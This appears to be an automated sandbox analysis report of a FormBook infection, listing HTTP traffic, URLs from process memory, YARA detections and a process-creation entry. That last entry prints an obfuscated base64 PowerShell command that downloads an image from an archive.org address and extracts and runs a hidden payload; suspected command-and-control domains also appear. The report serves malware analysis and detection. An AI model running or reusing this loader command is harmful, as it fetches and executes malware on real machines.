38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://elitecbdgummies.net/wp-json/>; rel="https://api.w.org/"x-litespeed-tag: 3eb_HTTP.404,3eb_PGSRPx-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 10 Oct 2024 08:01:37 GMTserver: LiteSpeedData Raw: 35 33 63 32 0d 0a f4 ff 1f 8a 48 56 6a 3d 14 51 55 eb e1 32 03 ae 66 f5 00 a8 5a 24 64 5e b0 fa e3 d7 9f 7f fe fb cb c0 d8 1d 10 cb 76 5c cf f7 9f bf d4 be eb 9f 2f ac 9d c1 52 22 04 76 ce e2 2a bd 8e dd 3b cd 5e 21 b3 23 c4 03 2b 15 12 2b 3d ec 78 28 97 4d ab f7 cc e7 d5 55 be 60 ee 5a 58 dd 0a 80 26 bc be 53 02 04 56 0d 69 25 70 d8 b0 98 aa ff b7 93 4f f8 63 fb 8f 15 53 1e 89 2d a7 ad f3 e6 0d 12 61 09 11 08 a8 20 29 47 59 fc 69 f5 df ec cf 57 ae 54 1f 33 7d 4b 69 61 30 93 b9 f6 8a 00 05 14 8c e4 95 e5 94 2b ff a7 69 59 0c 24 d1 1f f8 20 29 a3 70 14 c0 43 3c 30 ee 56 6b 66 64 ab d5 da 26 7d 9c 7c 1f c0 07 50 cd 42 15 5c 55 20 a5 e1 32 89 1d c4 1b 44 9b db 57 aa 95 32 99 b3 49 a2 24 50 7a 77 6f 7c 28 1b f9 ec 33 e9 a3 1e 13 00 bb 0c 00 ee 1b 60 c9 00 58 32 00 c9 0d 80 25 03 70 ef c6 00 03 ae f1 6f 78 ce f3 3d cf 5a ac 09 76 65 df da 58 a1 e2 bd 93 b1 2e 55 12 50 8a fe 7d aa f0 4b 41 a4 52 a4 ff 7f 6f 5a f1 8d 11 b0 94 01 ed e8 99 0d 09 2d ca 84 de 7b df 03 55 2a 01 c9 6e a0 6a 1b c8 f2 a4 a0 1e 7b 26 df 77 d3 ab fa f5 eb 97 24 cb b1 73 72 7b 53 4a 87 2f 21 13 32 da 90 e0 d2 25 ec 4b 9b 6a 42 62 7d 16 2d cf 70 01 81 43 f8 3e 8e 72 ff 73 a8 a4 d0 3e ec 63 64 73 47 1d 12 ea af 7e da 10 d5 7e 4e 83 86 6d 45 82 3b 48 9d b4 cb e1 fb 6d ef f7 bb dd 8a 46 44 10 6a a5 a9 8d a1 55 be 57 61 a8 22 ba b9 2f fe 90 e9 d7 de 9f cb 46 32 44 31 f0 c8 c5 b8 1c 95 75 7b ef d3 19 92 20 08 22 d8 8a 9e d4 2c 5e ec b0 b7 bd 57 9d 4f 12 70 d9 dd 2d b9 59 3c fb 69 f8 4c 12 57 38 fc 35 e2 71 00 49 76 88 43 99 e7 51 ef a0 57 c2 87 2e ff 0b ea 5b 83 40 6e 16 cf 9a 66 5c 53 ef 54 88 80 92 fc 54 3c e3 f8 75 dd 21 0e 19 fc 3f 9a bd 24 24 9e 13 82 43 49 3e bf 97 d0 74 40 ab 9c ea 41 12 a1 64 bd 93 5f 6b 1f 22 a3 d8 c0 7f 4f fe de 67 51 2b 0b 72 cd e3 2e 18 f7 2d 43 9f b5 06 a5 f3 a0 bf 13 34 68 e1 e6 37 d5 41 e2 3c 26 fd 6b fd 6e d2 1f ae 37 eb f5 36 b9 85 61 44 15 c6 92 d0 92 fc 02 87 d8 74 1a ff 46 d5 1a ab e0 6b 8f 71 45 d0 7c ab 5e 3d 65 a6 57 1d 64 3f 03 df 0c 87 72 fc 8c 3f 91 55 92 df 2c 5e 58 e3 be 25 01 ac 5c 35 2e 66 03 be df 06 ea dd aa d9 88 5f 0d f2 1c ac 41 d0 75 d3 8d 7d 6f 20 0a 07 18 f8 67 aa f5 0e a3 e8 bc ef 2c a8 c1 44 a1 7d bf 1e 05 91 86 bd d5 0a 8d 77 b9 54 88 39 90 49 5a 9c bb bd e4 03 40 f3 6e d2 Data Ascii: 53c2HVj=QU2fZ$d^v\/R"v*;^!#++=x(MU`ZX&SVi%pOcS-a )GYiWT3}Kia0+iY$ )pC<0Vkfd&}|PB\U 2DW2I$Pzwo|(3`X2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://elitecbdgummies.net/wp-json/>; rel="https://api.w.org/"x-litespeed-tag: 3eb_HTTP.404,3eb_PGSRPx-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 10 Oct 2024 08:01:40 GMTserver: LiteSpeedData Raw: 35 33 63 32 0d 0a f4 ff 1f 8a 48 56 6a 3d 14 51 55 eb e1 32 03 ae 66 f5 00 a8 5a 24 64 5e b0 fa e3 d7 9f 7f fe fb cb c0 d8 1d 10 cb 76 5c cf f7 9f bf d4 be eb 9f 2f ac 9d c1 52 22 04 76 ce e2 2a bd 8e dd 3b cd 5e 21 b3 23 c4 03 2b 15 12 2b 3d ec 78 28 97 4d ab f7 cc e7 d5 55 be 60 ee 5a 58 dd 0a 80 26 bc be 53 02 04 56 0d 69 25 70 d8 b0 98 aa ff b7 93 4f f8 63 fb 8f 15 53 1e 89 2d a7 ad f3 e6 0d 12 61 09 11 08 a8 20 29 47 59 fc 69 f5 df ec cf 57 ae 54 1f 33 7d 4b 69 61 30 93 b9 f6 8a 00 05 14 8c e4 95 e5 94 2b ff a7 69 59 0c 24 d1 1f f8 20 29 a3 70 14 c0 43 3c 30 ee 56 6b 66 64 ab d5 da 26 7d 9c 7c 1f c0 07 50 cd 42 15 5c 55 20 a5 e1 32 89 1d c4 1b 44 9b db 57 aa 95 32 99 b3 49 a2 24 50 7a 77 6f 7c 28 1b f9 ec 33 e9 a3 1e 13 00 bb 0c 00 ee 1b 60 c9 00 58 32 00 c9 0d 80 25 03 70 ef c6 00 03 ae f1 6f 78 ce f3 3d cf 5a ac 09 76 65 df da 58 a1 e2 bd 93 b1 2e 55 12 50 8a fe 7d aa f0 4b 41 a4 52 a4 ff 7f 6f 5a f1 8d 11 b0 94 01 ed e8 99 0d 09 2d ca 84 de 7b df 03 55 2a 01 c9 6e a0 6a 1b c8 f2 a4 a0 1e 7b 26 df 77 d3 ab fa f5 eb 97 24 cb b1 73 72 7b 53 4a 87 2f 21 13 32 da 90 e0 d2 25 ec 4b 9b 6a 42 62 7d 16 2d cf 70 01 81 43 f8 3e 8e 72 ff 73 a8 a4 d0 3e ec 63 64 73 47 1d 12 ea af 7e da 10 d5 7e 4e 83 86 6d 45 82 3b 48 9d b4 cb e1 fb 6d ef f7 bb dd 8a 46 44 10 6a a5 a9 8d a1 55 be 57 61 a8 22 ba b9 2f fe 90 e9 d7 de 9f cb 46 32 44 31 f0 c8 c5 b8 1c 95 75 7b ef d3 19 92 20 08 22 d8 8a 9e d4 2c 5e ec b0 b7 bd 57 9d 4f 12 70 d9 dd 2d b9 59 3c fb 69 f8 4c 12 57 38 fc 35 e2 71 00 49 76 88 43 99 e7 51 ef a0 57 c2 87 2e ff 0b ea 5b 83 40 6e 16 cf 9a 66 5c 53 ef 54 88 80 92 fc 54 3c e3 f8 75 dd 21 0e 19 fc 3f 9a bd 24 24 9e 13 82 43 49 3e bf 97 d0 74 40 ab 9c ea 41 12 a1 64 bd 93 5f 6b 1f 22 a3 d8 c0 7f 4f fe de 67 51 2b 0b 72 cd e3 2e 18 f7 2d 43 9f b5 06 a5 f3 a0 bf 13 34 68 e1 e6 37 d5 41 e2 3c 26 fd 6b fd 6e d2 1f ae 37 eb f5 36 b9 85 61 44 15 c6 92 d0 92 fc 02 87 d8 74 1a ff 46 d5 1a ab e0 6b 8f 71 45 d0 7c ab 5e 3d 65 a6 57 1d 64 3f 03 df 0c 87 72 fc 8c 3f 91 55 92 df 2c 5e 58 e3 be 25 01 ac 5c 35 2e 66 03 be df 06 ea dd aa d9 88 5f 0d f2 1c ac 41 d0 75 d3 8d 7d 6f 20 0a 07 18 f8 67 aa f5 0e a3 e8 bc ef 2c a8 c1 44 a1 7d bf 1e 05 91 86 bd d5 0a 8d 77 b9 54 88 39 90 49 5a 9c bb bd e4 03 40 f3 6e d2 Data Ascii: 53c2HVj=QU2fZ$d^v\/R"v*;^!#++=x(MU`ZX&SVi%pOcS-a )GYiWT3}Kia0+iY$ )pC<0Vkfd&}|PB\U 2DW2I$Pzwo|(3`X2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://elitecbdgummies.net/wp-json/>; rel="https://api.w.org/"x-litespeed-tag: 3eb_HTTP.404,3eb_PGSRPx-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 10 Oct 2024 08:01:43 GMTserver: LiteSpeedData Raw: 35 33 63 32 0d 0a f4 ff 1f 8a 48 56 6a 3d 14 51 55 eb e1 32 03 ae 66 f5 00 a8 5a 24 64 5e b0 fa e3 d7 9f 7f fe fb cb c0 d8 1d 10 cb 76 5c cf f7 9f bf d4 be eb 9f 2f ac 9d c1 52 22 04 76 ce e2 2a bd 8e dd 3b cd 5e 21 b3 23 c4 03 2b 15 12 2b 3d ec 78 28 97 4d ab f7 cc e7 d5 55 be 60 ee 5a 58 dd 0a 80 26 bc be 53 02 04 56 0d 69 25 70 d8 b0 98 aa ff b7 93 4f f8 63 fb 8f 15 53 1e 89 2d a7 ad f3 e6 0d 12 61 09 11 08 a8 20 29 47 59 fc 69 f5 df ec cf 57 ae 54 1f 33 7d 4b 69 61 30 93 b9 f6 8a 00 05 14 8c e4 95 e5 94 2b ff a7 69 59 0c 24 d1 1f f8 20 29 a3 70 14 c0 43 3c 30 ee 56 6b 66 64 ab d5 da 26 7d 9c 7c 1f c0 07 50 cd 42 15 5c 55 20 a5 e1 32 89 1d c4 1b 44 9b db 57 aa 95 32 99 b3 49 a2 24 50 7a 77 6f 7c 28 1b f9 ec 33 e9 a3 1e 13 00 bb 0c 00 ee 1b 60 c9 00 58 32 00 c9 0d 80 25 03 70 ef c6 00 03 ae f1 6f 78 ce f3 3d cf 5a ac 09 76 65 df da 58 a1 e2 bd 93 b1 2e 55 12 50 8a fe 7d aa f0 4b 41 a4 52 a4 ff 7f 6f 5a f1 8d 11 b0 94 01 ed e8 99 0d 09 2d ca 84 de 7b df 03 55 2a 01 c9 6e a0 6a 1b c8 f2 a4 a0 1e 7b 26 df 77 d3 ab fa f5 eb 97 24 cb b1 73 72 7b 53 4a 87 2f 21 13 32 da 90 e0 d2 25 ec 4b 9b 6a 42 62 7d 16 2d cf 70 01 81 43 f8 3e 8e 72 ff 73 a8 a4 d0 3e ec 63 64 73 47 1d 12 ea af 7e da 10 d5 7e 4e 83 86 6d 45 82 3b 48 9d b4 cb e1 fb 6d ef f7 bb dd 8a 46 44 10 6a a5 a9 8d a1 55 be 57 61 a8 22 ba b9 2f fe 90 e9 d7 de 9f cb 46 32 44 31 f0 c8 c5 b8 1c 95 75 7b ef d3 19 92 20 08 22 d8 8a 9e d4 2c 5e ec b0 b7 bd 57 9d 4f 12 70 d9 dd 2d b9 59 3c fb 69 f8 4c 12 57 38 fc 35 e2 71 00 49 76 88 43 99 e7 51 ef a0 57 c2 87 2e ff 0b ea 5b 83 40 6e 16 cf 9a 66 5c 53 ef 54 88 80 92 fc 54 3c e3 f8 75 dd 21 0e 19 fc 3f 9a bd 24 24 9e 13 82 43 49 3e bf 97 d0 74 40 ab 9c ea 41 12 a1 64 bd 93 5f 6b 1f 22 a3 d8 c0 7f 4f fe de 67 51 2b 0b 72 cd e3 2e 18 f7 2d 43 9f b5 06 a5 f3 a0 bf 13 34 68 e1 e6 37 d5 41 e2 3c 26 fd 6b fd 6e d2 1f ae 37 eb f5 36 b9 85 61 44 15 c6 92 d0 92 fc 02 87 d8 74 1a ff 46 d5 1a ab e0 6b 8f 71 45 d0 7c ab 5e 3d 65 a6 57 1d 64 3f 03 df 0c 87 72 fc 8c 3f 91 55 92 df 2c 5e 58 e3 be 25 01 ac 5c 35 2e 66 03 be df 06 ea dd aa d9 88 5f 0d f2 1c ac 41 d0 75 d3 8d 7d 6f 20 0a 07 18 f8 67 aa f5 0e a3 e8 bc ef 2c a8 c1 44 a1 7d bf 1e 05 91 86 bd d5 0a 8d 77 b9 54 88 39 90 49 5a 9c bb bd e4 03 40 f3 6e d2 Data Ascii: 53c2HVj=QU2fZ$d^v\/R"v*;^!#++=x(MU`ZX&SVi%pOcS-a )GYiWT3}Kia0+iY$ )pC<0Vkfd&}|PB\U 2DW2I$Pzwo|(3`X2
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7313000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ia600102.us.archive.org
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA769E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://paste.ee
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7550000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2415529480.000001F917296000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2265097583.000001FEA5C51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: QEwzeZKCXN.exe, 0000000C.00000002.3413713122.000000000549C000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.airgame.store
Source: QEwzeZKCXN.exe, 0000000C.00000002.3413713122.000000000549C000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.airgame.store/ojib/
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7360000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7550000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2415529480.000001F91724C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000002.00000002.2415529480.000001F917269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2265097583.000001FEA5C51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee;
Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com;
Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: dllhost.exe, 0000000B.00000002.3413640023.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3412271130.000000000384A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://code.jquery.com/jquery-3.5.1.min.js
Source: powershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fonts.gstatic.com;
Source: dllhost.exe, 0000000B.00000002.3413640023.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3412271130.000000000384A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://gamesfunny.top$
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7550000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA6C45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA730E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia600102.us.arX
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA5E73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2265097583.000001FEA7002000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia600102.us.archive.org
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7002000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA5E73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2265097583.000001FEA7002000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgX
Source: dllhost.exe, 0000000B.00000002.3410035281.00000000033AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: dllhost.exe, 0000000B.00000003.2920396732.0000000007F40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: dllhost.exe, 0000000B.00000002.3410035281.00000000033CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: dllhost.exe, 0000000B.00000002.3410035281.00000000033CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: dllhost.exe, 0000000B.00000002.3410035281.00000000033AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: dllhost.exe, 0000000B.00000002.3410035281.00000000033CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: dllhost.exe, 0000000B.00000002.3410035281.00000000033CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA769E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7360000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7360000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA606D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://paste.ee
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA606D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/mFPBh/0
Source: dllhost.exe, 0000000B.00000002.3413640023.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3412271130.000000000384A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://playchill.top/api/axgames/request?domain=$
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.gravatar.com
Source: dllhost.exe, 0000000B.00000002.3413640023.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3412271130.000000000384A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://themes.googleusercontent.com
Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com;
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA61E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown HTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49724 version: TLS 1.2

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 5.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3409933313.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2743702515.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 5.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3409933313.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.2743702515.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6568, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1492, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29u